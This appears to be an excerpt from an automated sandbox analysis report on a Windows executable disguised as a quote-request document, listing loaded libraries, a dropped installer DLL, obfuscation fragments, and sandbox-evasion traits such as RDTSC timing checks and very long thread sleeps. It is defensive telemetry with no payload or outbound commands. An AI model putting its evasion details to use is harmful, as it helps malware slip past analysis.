      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2239950600.00000000079ED000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_3_0019CA98 pushfd ; retf 0019h5_3_0019CA99
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_3_0019EE8C push eax; iretd 5_3_0019EEA9
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_3_0019CF4C push eax; iretd 5_3_0019CF4D
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_3_0019EE60 push eax; iretd 5_3_0019EE65
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00159C30 push esp; retf 0017h5_2_00159D55
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile created: \request for quote and collaboration docs.exe
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile created: \request for quote and collaboration docs.exeJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeFile created: C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeAPI/Special instruction interceptor: Address: 81FC939
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeAPI/Special instruction interceptor: Address: 667C939
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeRDTSC instruction interceptor: First address: 81C1D14 second address: 81C1D14 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FECB92352A5h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test cx, ax 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeRDTSC instruction interceptor: First address: 6641D14 second address: 6641D14 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FECB9113035h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test cx, ax 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeMemory allocated: 37750000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeMemory allocated: 37560000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599797Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599688Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599563Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599438Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599313Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599188Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599078Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598969Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598844Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598734Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598625Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598509Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598406Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598297Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598188Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598063Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597953Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597844Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597719Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597609Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597500Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597391Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597281Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597172Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597063Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596938Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596828Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596719Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596594Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596484Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596375Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596266Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596156Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596047Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595938Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595813Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595703Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595594Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595469Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595360Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595235Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595110Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594985Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594860Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeWindow / User API: threadDelayed 732Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeWindow / User API: threadDelayed 9106Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep count: 31 > 30Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -28592453314249787s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4600Thread sleep count: 732 > 30Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599797s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4600Thread sleep count: 9106 > 30Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599688s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599563s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599438s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599313s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599188s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -599078s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598969s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598844s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598734s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598625s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598509s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598406s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598297s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598188s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -598063s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597953s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597844s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597719s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597609s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597500s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597391s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597281s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597172s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -597063s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596938s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596828s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596719s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596594s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596484s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596375s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596266s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596156s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -596047s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595938s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595813s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595703s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595594s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595469s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595235s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -595110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594860s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594735s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594610s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594485s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe TID: 4144Thread sleep time: -594235s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405772
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 5_2_0040622D FindFirstFileW,FindClose,5_2_0040622D
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599797Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599688Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599563Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599438Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599313Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599188Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 599078Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598969Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598844Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598734Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598625Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598509Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598406Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598297Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598188Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 598063Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597953Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597844Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597719Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597609Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597500Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597391Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597281Jump to behavior
